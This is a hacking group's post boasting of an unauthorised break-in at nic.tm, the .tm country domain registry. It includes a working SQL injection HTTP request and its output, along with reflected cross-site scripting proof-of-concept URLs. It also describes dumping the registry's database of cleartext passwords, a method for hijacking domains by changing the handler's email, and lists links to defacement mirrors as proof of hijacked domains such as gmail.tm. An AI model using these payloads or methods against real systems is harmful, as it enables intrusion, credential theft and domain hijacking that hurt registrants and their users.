In an independent project we decided to penetrate some important sites and today we wanna share a small part of what we have done. Today we proudly announce about nic.tm here, it has a vulnerable application which is prone to a MySQL injection bug. It was a big lead for us to have all sites credentials. The rest of this update, we shall indicate about the vulnerability affected the site.
If you glance at picture below:
It can be understood that the hidden parameters might not be checked, it was a hole we’ve focused on it:
POST /cgi-bin/mail_my_domains HTTP/1.1 Host: nic.tm Content-Type: application/x-www-form-urlencoded Content-Length: 142 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Connection: Close Addr=1029999%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28system_user%28%29+as+char%29%29%29%2C0x27 %2C0x7e%29--+a&OrderBy=1
And we received:
.................. .................. ..................The database search found 0 ~'drs@localhost'~ domains
Oops, we saw the data leakage from Nic.tm’s database, drs@localhost is current user of database. In the term of data gathering, we made the attack automatically and dumped all the database. Another considerable note was the passwords, they have been saved in clear text and this is an unacceptable issue for a NIC of a country. All dumped data are accessible by this link. We also found some important domains among the dumped data (They have been listed below), we were capable of hijacking them easily:
www.youtube.tm www.gmail.tm www.msdn.tm www.intel.tm www.officexp.tm www.xbox.tm www.windowsvista.tm www.orkut.tm www.google.tm (?) www.yahoo.tm www.cisco.tm
This was not end of story, we realized that the application suffers from reflected Cross site scripting too. The infected parameters were Addr and OrderBy, POCs:
/cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1%E2%80%9C+a&OrderBy=1847ae%27%3E%3Cscript%3Ealert%281%29%3C/script%3E /cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1--+ad4a26%3E%3Cscript%3Ealert%281%29%3C/script%3E&OrderBy=1
They both correctly work on Firefox. At last I would show you panel of Gmail.tm after authentication:
We can also indicate to another security imperfection, in the panel, if you want to change the DNS of a domain, A confirmation e-mail is also sent to handler’s email which can be changed to attacker’s mail address. The following domains were defaced for POC:
http://zone-h.org/mirror/id/19125537
http://zone-h.org/mirror/id/19125766
http://append-hc.com/mirror/id/66204
http://zone-h.org/mirror/id/19126130
http://zone-h.org/mirror/id/19126154
http://zone-h.org/mirror/id/19125901
Have a nice hacking, be safe.